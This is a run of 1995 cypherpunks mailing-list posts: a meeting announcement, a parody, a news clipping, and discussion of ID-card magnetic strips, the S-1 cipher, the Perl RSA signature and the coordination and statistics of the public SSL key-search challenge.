organized, including picking a name.  The imposing name "Boston Society for
Digital Commerce" is just prima facie, subject to change at the first
meeting.

At the moment, I'm looking at a meeting date of Tuesday, October 3rd,
and at a location to be named later for lunch, say from 12:00 to 2.
I'll give you a hint: it's a 30th floor room overlooking the Charles
from downtown , and, yes, you need a coat and tie.  I figure I'll
collect checks payable to the place where we have lunch, with, say, a
registration cutoff of 2 days prior to the event, so I can get the room
paid for in advance, and so we can bootstrap this financially until
we come up with a better method for doing things.

How to Sign Up: Reply to this message if you're interested in helping
this get started, or if you just want have lunch and talk shop with
people who'll actually understand what you're saying, and I'll give you
all the details.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gerstein@scsud.ctstateu.edu (Adam J. Gerstein)
Date: Tue, 29 Aug 95 10:30:16 PDT
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: Florida Drivers Permits
Message-ID: <v02130504ac67f7eda3c3@[17.127.10.254]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:54 AM on 8/29/95, Jonathan Zamick is believed to have said:
>>>>Better would be to figure out the encoding scheme and post it here.
>>>
>>>I like this, myself.  It'd be nice to be able to have the picture of my
>>>choosing instead of a digitized thumbprint...
>>
>>I think the officer arresting you would frown if your license dumped a nudie
>>picture of Cindy Crawford instead of your identification details.
>>
>>Sounds like a great way to smuggle nuclear secrets out of a country tho :)
>
>What is the capacity of the mag strips. Do they carry much more than some
>ID code for computer reference? It seems unlikely that there is enough
>storage
>for a thumbprint. Some vitals perhaps, but again it would most likely simply
>be a speedier way of referencing the card holder's supposed True Name. (After
>all they'd have to be checking driving record information as well.) Still
>decrypting the cards would be amusing, just to aggravate those who become to
>used to the convienience. 'Oh.. sorry Governor Wilson... my but you look
>different up close'.

Back in CT they have mag strips and holograms on the drivers license, but
they aren't taking full advantage last I checked (about 8 months ago, when
I was last in CT).

Anyway, once an enterprising c'punk cracks the code, whats to stop people
from putting more interesting info on the strips? Or possibly a virus? Is
it conceivable? And if there is enough room on there for personal info, why
not wipe the data that's there and put your PGPKey there. And when Officer
Opie asks "What happened to your info and why's it all scrambled?" an
innocent "I dunno" would have to suffice....

Just my 0.02...

adam

"Practice safe HEX - always use a keyboard condom" - anon
PGP Key available by finger or mail with the sub: PGPKEY
+-------------------------------------------------------+
|(e)Mail me:                    |  MacGeek@eWorld.com   |
|  Gerstein@scsu.ctstateu.edu   |  AGerstein@aol.com    |
+-------------------------------+-----------------------+
                    EWWWWW! - Betsy
             Shop smart! Shop S-Mart! - Ash






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 29 Aug 95 10:26:50 PDT
To: <cypherpunks@toad.com>
Subject: TLA Menu!
Message-ID: <v03002d00ac67ba46a3f6@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Time to use your imagination, because...


It's the TLA Phone Menu!                       pair-o-dee by <ddt@lsd.com>


[   A french horn version of "The Lion King" fades in quickly, and a       ]
[   smarmy male voice reminiscent of that 415.777.FILM guy comes on...     ]


"Welcome to the Three Letter Agency's Help Line!

- If you're calling to report a threat to National Security, please press
  "1" now...
- If you're calling to threaten the life of the President of the United
  States, please have your manifesto ready to fax and press "2"...
- If you're calling to report a bomb that's been left somewhere at a TLA
  complex, please have your five-digit terrorist group identification code
  ready and press "3" now...
- If you're calling to report an imminent nuclear emergency within the
  territorial borders of the United States, please press "4" now...
- If you're calling to find out what "Squeamish Ossifrage" means,
  please press "5" now...
- If you're calling to inform on Phil Zimmermann, please press "6" now...
- If you're calling to report an Internet security problem that may affect
  our ability to packet-filter your local network, please press "7" now...
- If you're calling to donate money to Senator Exon's re-election campaign,
  please press "8" now...
- If you're a member of any State Militia or paramilitary group needing
  assistance with plans to overthrow a state government, please have your
  copy of the US Constitution ready and press "9" now...
- If you're submitting a new encryption algorithm challenge, please visit
  our website at http://www.tla.gov/cray-this, or press "0" now...
- If you're calling to report any unauthorized use of cryptography by
  pornographers, drug dealers, terrorists and/or religious cults, please
  press the "star" key now, or stay on the line, and a National Security
  Analyst will be with you in a moment..."

[   Naturally, we press the "star" key... a few mournful moments pass      ]
[   as, in the background, a valiant attempt is made by 40 melancholy      ]
[   strings and an antic saxophonist to produce a Musak rendition of       ]
[   Rockwell's "(I Always Feel Like) Somebody's Watching Me," when         ]
[   suddenly the Musak fades back...                                       ]

"...Thank you for your patience. All of our jack-(and jill!-) booted agents
are busy cracking other citizens' shopping-lists or reverse-tracing your
phone number at this time, but your call _is_ important to us, so please
remain on the line, and a National Security Analyst will be with you
momentarily..."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Wed, 30 Aug 95 08:13:54 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508291415.AA02629@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Daniel R. Oelke:
> 
[presumably piete brooks?]:
> > >PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
> > >     use "time", and I can't see a way to get "date +" to yield the raw time.
> > >     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
> > >     may not be on teh users PATH. Any suggestions ?
> >
[anonymous?]
> > "date '+%s'" does it under BSDI, but I'm not sure how portable it is.
>  
> This is what I got from SunOS 4.1.x
>  
>         $ date +%s
>         date: bad format character - s

	On Ultrix, I get:

$_ date '+%s'
s
$_

and on OSF/1:

$_ date '+%s'
%s
$_

	XMan (OSF/1) says:

		"To display the date and time in a specified format, enter:

		date +"%r %d %h %y (%a)"	[note the `+' outside the ""]

which gives me:

		08:58:39 AM 29 Aug 95 (Tue)

FWIW ...


-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 29 Aug 95 10:31:12 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508291427.AA00854@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
>  The main failure mode seems to have been misconfigured clients
>  grabbing the single-threaded server for a long time; it may be
>  worth using a multi-threaded server, or alternatively a
>  single-threaded server that has a fast timeout for how long it will
>  talk to a client.

Single-user is just plain silly.  With a fast timeout you still have problems  
with misconfigured clients hogging the server and legitimate clients that are  
running a little slow will also have problems.  The server in the second  
challenge did have a fast timeout (it was too fast to easily query the server  
by hand, for instance) and it still wasn't adequate.  I can't imagine making  
the timeout smaller.  multi-user is the only way to go...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Tue, 29 Aug 95 06:46:16 PDT
To: cypherpunks@toad.com
Subject: Decoder ring
Message-ID: <Pine.SUN.3.91.950829093407.21598A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


     High-Tech Company Goes Back to the Future with Decoder Rings
The Stuff of Cereal Box-Tops Becomes Real Repository of Data and Computer ID

			   By Carlos Tejeda
	      Staff Reporter of the Wall Street Journal

Once, the only way to get a decoder ring was to carve up cereal
box-tops or comic-book covers.

Now Dallas Semiconductor Corp. is creating its own high-tech version of 
the "decoder" ring.  Although this one doesn't break any codes, it can 
unlock some doors of information.  It consists of a 64000-bit microchip, 
embedded in a silver ring made by class-rings titan Jostens Inc., of 
Minneapolis.

The rings can be implanted with a replica of a driver's license, 
credit-card numbers and even a digitized photograph.  Company officials 
say they hope the ring's data-carrying capability will help bring 
personal information literally to one's fingertips.

"My wallet's stuffed with a dozen different plastic cards," said Hal 
Kurkowski, Dallas Semiconductor's group manager for auto-identification 
products.  "It's an awful mess.  You could put all that and more into the 
ring and not have a four-inch-thick wallet."

The ring is triggered when the metal piece at the head of the ring comes 
in contact with a data reader.  To prevent theft, the ring can be 
formated so that it only can be used in conjunc tion with a password, Mr. 
Kurkowski said.

The technology already is being used at Dallas Semiconductor's 
headquarters, as something of a company ID card, said Syd Coppersmith, 
director of public relations.

"I use it to get into my office, and it records who I am and when I went 
in," she said.  "There's a reader on my PC, and I use it to get into my 
files."

The rings cost about $60 each, while readers that can be plugged into a 
computer can be purchased for about $80.

Ms. Coppersmith said several security companies already have the 
technology to install such readers for their clients.  She said the 
system also has been tested commercially at a warehoiuse, where employees 
used the ring to record inventory changes.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 16:57:28 PDT
To: jpb@shadow.net (Joe Block)
Subject: Re: Florida Drivers Permits
In-Reply-To: <v01520c02ac676a6dcba1@[198.79.48.55]>
Message-ID: <199508282255.AA46059@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>Better would be to figure out the encoding scheme and post it here.
>
>I like this, myself.  It'd be nice to be able to have the picture of my
>choosing instead of a digitized thumbprint...

I think the officer arresting you would frown if your license dumped a nudie
picture of Cindy Crawford instead of your identification details.

Sounds like a great way to smuggle nuclear secrets out of a country tho :)

Mark
The above opinions are rumoured to be mine



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 17:25:13 PDT
To: ab411@detroit.freenet.org
Subject: Re: SSL trouble
In-Reply-To: <199508281852.OAA22478@detroit.freenet.org>
Message-ID: <199508282326.AA32757@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>Patrick Horgan <patrick@Verity.COM> writes:
>>I did a distributed scheme for something else that had two levels, a master
>>and a group of slaves.  Only the slaves talked to the master.  For this 
>>effort I think a variation of the idea would be better.  Have all of the
>>brutes contact the master, who will, in the first transaction assign them
>>to the next slave in a round-robin fashion.
>
>Why not just have the brutes pick a slave at random?  Of course, you need
>to give them a complete list of slaves to choose from.  But then the only
>difference between the master and the slaves will be that the master
>doesn't get any keyspace (it's got it all to begin with) and doesn't
>report any results upward.

Better to include in the clients a list of all slaves and have the initial
contact to a slave random, maybe weighted by network proximity, and either
have the clients cycle to each slave with each ACK, or have the slave TELL
the clients what server to ACK to next, based on slave to slave balancing.
Slaves could tune their pointers to faster slaves and transparently handle
crashed slaves

The idea is to have all the slaves working evenly, assuming they are on equal
nets and equal machines. If not then you can have the slaves tell clients to
only point to a weaker slave once in a while.

I dont think advertising the master is a good idea, better to have the slaves
talking to it only. A backup mirror master would be worthwhile too.

Web people would most likely have to communicate with the one central http
server as you have to Keep It Simple for them.

Comments?

Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Tue, 29 Aug 95 10:25:57 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Austin cpunks?
Message-ID: <199508291532.AA15521@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If you live in the metro Austin area, please drop me a line. To the
rest of you, sorry for the noise.

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEMy6afb4pLe9tolAQEXrwP/dPhTNVeuzNYA78Aow2B9ruINvBO324tG
sRa2HYdT8bpZGh8DBXx7hS9zIFNMF5qw6GeoVpK8aqwmRhdbbnNoVq8x5Cps/APQ
lQRu3AqPvtu46fZK6/faBHdzElqSNRIvQxG1O3o1kZhLmZctxdlyu00wJgH7tj/Z
+jMhQ7kaWgQ=
=VmEL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Tue, 29 Aug 95 10:20:46 PDT
To: dawagner@tucson.princeton.edu
Subject: Re: Cryptanalysis of S-1
In-Reply-To: <41l6u3$852@cnn.Princeton.EDU>
Message-ID: <skEmR=X0BwwMM0o3Im@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


I find this very interesting.  You have made two related points here
which highlight some important principles of cipher design: (1) more
rounds do not always help and (2) the key schedule can be a limiting
factor in a cipher's strength.  In some sense these are "obvious", but
it helps a lot to have a specific example of these points to think
about. 

After the early looks at S-1 and after reading Blaze & Schneier's paper
on MacGuffin (ftp://research.att.com/dist/mab/mcg.ps) I was thinking
that any half-assed Feistel network could be made secure by adding more
rounds.  So I was thinking about quantifying the systemic cost of adding
more rounds and thereby reducing performance.  It seems that there has
been insufficient analysis of the performance vs. security trade-off. 
In some sense this is understandable given the lack of quantification of
security, but when it comes to engineering a system for real world use,
you have to make a choice and it would be nice to have something to go
on.  Consider for example the use of Blowfish instead of IDEA in
PGPfone; according to Paul Rubin [in "Re: IDEA with PGPFone?",
28-Aug-1995, sci.crypt] this was at least partly due to the performance
difference. 

But here we have a clear limit.  In S-1 the key schedule effectively
limits the number of rounds that contribute to security at about five. 
Further we have a concrete design principle: the per-round sub-keys
should not repeat.  Probably a stronger statement could be made. 

Excerpts from netnews.sci.crypt: 16-Aug-95 Re: S1 cipher P.
Hallam-Baker@w3.org (3569*) 

> I would like to suggest some hypotheses :- 
Maybe this type of cryptanalysis is old hat but it seemed new to me.  It
made me think of another hypothesis for the S-1 release: 
  - It is a training exercise. 
Consider that the primary reason given for keeping Skipjack secret is
that the algorithm would reveal valuable hints about cryptanalysis and
cipher design.  It also seems obvious that the NSA would have a College
of Cyptanalysis to educate new generations of crypto experts.  I could
easily imagine it including a series of exercises, of progressively
increasing difficulty, where attacking each cipher illustrates one or
more cryptographic principles.  Possibly an crypto-anarchist NSA mole
decided it would be safer to leak page from NSA's workbook than Skipjack
itself; an infraction less likely to be persued if nothing else. 

If this seems unlikely, consider that the NSA has been getting beaucoup
bucks for many years now.  With the fall of the "Evil Empire" and all,
perhaps things are getting a bit soft at the core.  Maybe some NSA
strategist figured that a little cross-fertilization between the
academic and national-security crypto communities would enliven both
groups. 

So the question is: Will another exercise appear?  Or perhaps there is
more to learn from this one. 

Ted Anderson 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 29 Aug 95 10:22:16 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508290338.XAA24000@interport.net>
Message-ID: <9508291647.AA13894@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Will French writes
>Scott Brickner writes:
>> Then what do you care about the group's procedures?  It
>> doesn't "prevent you from participating" --- you *aren't*
>> participating. You're attempting to solve the problem on your
>> own.

>  This distinction is valid in the current series of academic
>exercises.  However, if we were actually trying to break
>something important, anything that might accelerate the crack
>would be a form of participation.  And as Nathan Loofbourrow has
>pointed out, the random method is much more secure against
>real-world retaliation.  It's also the only method that will
>work for me; I use a shell account, and I never know in advance
>when I will get time on the computers at work (which aren't on
>the net at all).

We've identified several forms of "real-world retaliation:"

1) "Result hoarding" - failure to report a found key
2) "Segment hoarding" - requesting more segments than one can hope to search
3) Denial of service - preventing access to the server

The "random search" method eliminates all three of these at about 37%
higher cost in search time, on the average.  I submit that if we
*really* were trying to break something important, we could design a
system which eliminated the first two and adequately limited the third,
but at *much* less cost.

The problems in the current system were to be expected of a first
attempt.  In the future:  Only the server assigns segments, only the
assignee may report the status of a segment, and after all segments are
NAKed we know condition 1 has occurred, at which time we start over,
but never assign the same segment to the same searcher.  Limit the
number of segments which may be outstanding with one searcher at one
time as a function of work rate.  Deploy redundant servers.

As to whether the distinction is valid, I'd still say the only
difference between working on your own and working "with" the group,
but using an uncoordinated, random search method is one of intent ---
that is, it's all in your mind.

>  I _don't_ care about the procedures, as long as I can get the
>information I need to go my own way.

So what information wouldn't you be getting?  To "go your own way", you
need exactly the same information that the client workstations use to
test one key.  The difference in your code and the clients exists
solely in how they determine the next key to try.

You're not "participating" when you go your own way.  You're working on
cracking the cipher, but you're not adding your efforts to the group
effort, you're working independently.  I'm not saying this is "wrong".
You're supposedly a free person, do what you think is right.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Tue, 29 Aug 95 10:20:21 PDT
To: cypherpunks@toad.com
Subject: Joel's RSA-t's
Message-ID: <01HUN7RYOMZM003M4J@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Josh Osborne's RSA-perl T-shirt venture,
> 
> I don't know about the rest of you, but I didn't realise from Joel's
> last post to the list that he was taking orders for then.  I guess
> that's as close to an announcement as he's going to make.  I just
> checked his netstuff web page, and he's taking orders now!
> 
> Check out:
> 
> 	http://www.danger.com/ad-perl.html
> 
> (this is referenced from Joel's netstuff page under currently
> available items:
> 
> 	http://www.danger.com/netstuff.html
> )
> 
> From the Joel's web page:
> 
> > DEADLINE TO ORDER: All orders for these shirts must be postmarked by
> > June 1, 1995.
> 
> Also my page on perl-rsa is:
> 
> 	http://dcs.ex.ac.uk/~aba/perl-rsa.html
> 
> I'll be away from my mail for the rest of this week, so maybe someone
> can post this info to all the crypto groups...
> 
> Adam
> --
> 
> HAVE *YOU* EXPORTED A CRYPTO SYSTEM TODAY? --> http://dcs.ex.ac.uk/~aba/x.html
> --rsa--------------------------------8<-------------------------------------
> #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
> ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
> Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
> ,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
> -------------------------------------8<-------------------------------------
> TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
> 
	

Has anyone received a shirt from Joel?  Or is he ripping people off?

Many thanks,

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 29 Aug 95 12:05:44 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508291905.MAA04950@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:47 PM 8/29/95 -0500, you wrote:
>Alan Olsen writes
>>They would not have to include an entire thumbprint.  The actual code used
>>to verify fingerprints is not very large.  All that would be needed is
>>enough information to ID into the "official" records and enough checksum
>>type information to prevent alteration/counterfitting.  Using magnetic media
>>for this is a bit foolish as it can be changed/destroyed with the stroke of
>>a magnet.  I will not say by what means I would think should suit as a
>>better encoding scheme because: 1) They are not using it and 2) I do not
>>want to give them any ideas.
>
>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?
>
>This seems silly.

I was pointing out that it was possible.  I was not trying to make the point
that there was any *USE* for such a thing.  (Evidently some ID cards now
carry such prints. California does, if memory serves me correctly.)

Just because something is silly does not mean it will not be tried by
someone in law enforcement.  In fact, there seems to be a corelation between
silly acts and law enforcement...  (Or at least those making the rules about
law enforcement.)  And if you think it cannot get any worse, Pete "I want to
seal the borders" Wilson has announced he is running for president.  We will
be getting a large number of silly laws and pronouncements if the American
people are stupid enough to elect him to high office.

>
>
|            Visualize whirled keys!              | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 29 Aug 95 12:57:06 PDT
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v02120d04ac6927926ea0@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:57 8/28/95, Alan Olsen wrote:
>They would not have to include an entire thumbprint.  The actual code used
>to verify fingerprints is not very large.

This is true. While waiting for the local US Post Office clerk to process a
passport application, I browsed through their book of FBI's Most Wanted
(available at every Post Office, just ask for it). Each person's
fingerprints were specified with an alphanumeric code that took up less
than half a line.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: d-jones@ix.netcom.com (Dave)
Date: Tue, 29 Aug 95 12:35:40 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508291933.MAA22876@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?
>
>This seems silly.

There are device that will electronicly read fingerprints available now.  So
with such a device, the LEO would know instantly if you were who you said
that you were.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Aug 95 12:42:52 PDT
To: cypherpunks@toad.com
Subject: SSL keyspace etc.
Message-ID: <199508291940.MAA22969@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


regarding SSL challenge, I am not following this close enough 
to understand completely, but I thought I would offer a few suggestions
for tweaking the code:

--

the issue of grabbing keyspace has been raised. what if someone
malicious just yanked huge areas of keyspace and didn't search them?
it seems that the clients need to return to the server some evidence
that they have searched their keyspace in question. the server could
verify this evidence. for those that don't return the "evidence", that
keyspace could be reallocated to other comers.

the simple approach to all this, if you don't have "evidence", is to 
just have the server keep reallocating the same space over and over
to different crackers. hopefully eventually every part of the keyspace
would be allocated to a "legitimate" worker.

--

the issue of efficiency is very fascinating for this project. essentially
the server has no idea what the block size of key blocks it should dole
out. obviously the server would want to try to dole out equal *processing
chunks* such that the remote machine reports back in a certain amount
of time, no matter what architecture. the problem of course is that remote
machines all have different efficiency.

two possibilities: a sort of "bogomip" calculation is done in the client,
and its processor speed is reported to the server. the server uses
this in a calculation to determine how much to dole out. it could try 
to derive a best fit linear relationship between space covered and
processor spead, or build up a table of results and interpolate for
new requests.

note that the efficiency issue also ties into "what if people take
keys they don't solve". if the server knows roughly how long a client
should take to report back, and it never reports back, it could then
reallocate that key space.

--

another problem of efficiency is that the server is clearly a bottleneck
for servicing requests. the question arises: suppose that the server
could determine the precise interval between which machines would
go back to it for new keys. what is the optimum interval over the
whole project? in other words, give the number of machines participating,
and their processor speeds, what size of key space should be parceled
out to the next request so that the bottleneck at the server is
minimized? this optimum interval must be very hard to derive, because
it depends on the contention based on many incoming connections. it
would involve some probabilistic approximations of the likelihood
of collisions. 

to model it, you might consider a request as taking [n] seconds of
time, and consider that if any two requests are in contention, a 
retry happens after [m] seconds. you could build up models that
would try to minimize the time based on empirical simulations. 
however I would be exceedingly impressed if someone could derive
a formula for this, or give it from some textbook. 

--

adaptive algorithms for all these situations are possible. the server
could use a "hypothesis" in the sense of partitioning out a starting
size of keyspace, and then watch how long it took the client machine to respond,
and then assume a linear relationship or something to compute the size
of the next keyspace to hand out to the machine. the server could continually
watch how closely its "hypothesis" (i.e. its estimations of how long a
given machine will take) match the actual returns.

--

more on the idea of evidence: we are working with a hashing algorithm,
right? as evidence the client machines could return checksums of all
the hashes of all the keyspace it searched. it could break up its
own search space into blocks and return the checksums on the hashes
for each block. the server, if it wanted to, could verify these blocks
running its own computations. if it ever found a client was "unreliable",
it could then diminish the keys sent to the unreliable client, or even
send it areas of search space it didn't care about anymore (i.e. areas
that have already been confirmed searched by a more "reliable" client).

--

in fact all this reminds me of the process of intelligence gathering
by an agency, which could be formalized as follows: suppose that
the agency wishes to identify "quality information". it has a set
of sources, A,B,C,D....  now, it can send questions out to these
sources and get information from them. some of them however would
be "unreliable". the agency must devise some means by which it can
weed out the unreliable sources. note that this may even involve
sending them bogus instructions to keep them busy so they do not
themselves suspect they have been "discovered" and then change
their defective plans.

obviously, one of the most important intelligence tools in this
matter is that of *correlation*. you have to determine "truth"
(or "quality information") via the correlation between answers that
the different sources give you. also important to correlation is
*redundancy*. you sometimes have to ask more than one source the
same question, and test the answer. in this model, if A and B
give different answers, you know that one of A or B is "unreliable".

what is very interesting in our case of cracking keys is that the
server can verify the information on its own. in other words, it
has a *control* that it knows is correct that it can judge against
the answers "out there". unfortunately, in contrast, real intelligence
agencies are not always privy to this kind of certain "control" and
in fact have to determine "truth" entirely from a set of sources,
any of which might be unreliable. in this case one has to have
a hypothesis about what is the "truth" and test it to see if it
holds up consistently with all information.

the approaches of attackers are obvious. the most obvious is that
of collusion and infiltration. but I will save the rest for some
NSA spook to elaborate. there are certainly enough colluding and
infiltrating on this list <g>

--

one of the reasons all this interests me is that it really reminds me
of some projects I have worked on in the past. in high school I wrote
a network mandelbrot set program (client/host). the issue of contention
arose and it appeared to me to look like an upside-down parabola after
I plotted some points (curving up, that is). i.e. the optimum was at
the pit of the parabola, and when too few or too many requests happened,
the speed over the overall simulation was increased above the optimum.
some very ingenious readers may actually be able to locate this 
code, which I put in the public domain over 5 years ago.

--

another thing I worked on was trying to find the optimal block size
of communications protocols such as Zmodem, which generally instead
just pick arbitrary block sizes 2^n. I actually was able to attack
this problem analytically through the observations of the properties
of infinite series and calculus techniques. it is a similar problem
but the idea of contention really complicates this issue. (for what
I studied, there was only one client and one server, so to speak).

I still have this paper in Latex format and if anyone is interested
I would be happy to send it to you. it's a really nice example, IMHO,
of how if you use your brain and some mathematics, you can really
get a far more elegant approach than brute force, and know with 
much greater certainty  that what you are doing makes sense 
mathematically.

an awful lot of programmer just tend to bang on the keyboard with out
thinking of the theoretical implications of their work. this is
understandable given that the theoretical implications of even trivial
programs (such as the SSL client/server interactions) can be 
mathematically extremely daunting, requiring even differential 
equations to model fairly simple pieces of code.

--

well, that is my contribution of the moment into the cypherpunk 
annals. one never knows what a little combination of boredom 
and inspiration can lead to.

--V.Z.Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 29 Aug 95 12:55:59 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <v02120d05ac692a58156d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:56 8/28/95, Timothy C. May wrote:

>Seriously, I'm awfully skeptical that any kind of remote sensing device is
>to be placed in the breasts of women seeking enhancement. The technology
>just does not currently support small devices, though I suppose some of the
>55GG strippers could support an active transmitter (or, "transtitter").

The homepage of the horse tracking devices that I recently posted states
that the devices are 11 mm long and can be injected with a 12 gauge needle.
Even has an acctual size picture of the device. Small enough to fit into a
breast implant.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 12:54:10 PDT
To: cypherpunks@toad.com
Subject: Poisson numbers for random keyspace assignment
Message-ID: <ac68b5601a0210040a9d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 PM 8/29/95, Damien Doligez wrote:
...
>But you fail to take into account the probability that the search will
>have to go that far.
>
>
>This is how I compute the expected cost of the random search.
>
>The probability of finding the key upon searching the k-th segment is:
>
>                  k-1
>  p(k) = (1 - 1/n)    . 1/n
>
>The expected cost is the sum of all possible costs, weighted by their
>probability:
>    ___                 ___
>    \                   \              i-1
>e =  >  i p(i)    = 1/n  >  i (1 - 1/n)
>    /__                 /__
>    i = 1..oo           i = 1..oo
...

I haven't checked Damien's notation and confirmed the results, but I have
another way of looking at it, which I think produces the same results.

Last night (but it didn't arrive at my site until moments ago, for some
reason) I wrote:

>On the positive side, let everyone simply attack the keyspace as they see
>fit, picking random parts to attack. This should not be "worse" than a
>factor of several from a "perfectly coordinated" attack. (I haven't spent
>time calculating this, but my intuition is that a random attack, with
>overlapping keyspace, is not a lot less efficiently attacked than
>attempting to arrange for no overlaps...just based on my mental picture of
>dropping line segments randomly on some interval and figuring coverage of
>the line segment.)

Here's what I meant, in more detail:

Imagine the overall keyspace to be searched as a line segment of some length:

[------------------------------------------------]

Now imagine various people randomly picking starting points and doing some
segment, depending on their compute power:

   [---]
                           [--]
 [--------]
            [------]
                                 [-]
                                   [--------]

...and so on, with the various line segments scattered randomly. Some will
overlap, meaning the same keyspace segment is being searched by two or more
people.

If the total length (summation) of these line segments is the same as the
"brute force exhaustion" of the keyspace, we can do some interesting
calculations.

For example, the "expected" number of hits per point is "1". But some
points will be hit 0 times, others will be once, twice, three times, etc.
(This is in the nature of random processes, as each line segment is random
and "independent" of what other people may have independently picked.)

The Poisson distribution fits this situation exactly, with the _actual_
number of hits computed by:

P(s;m) = (e ^ -m) (m ^ s) / s!

where s is the actual number of hits and m is the expected number. P(s;m)
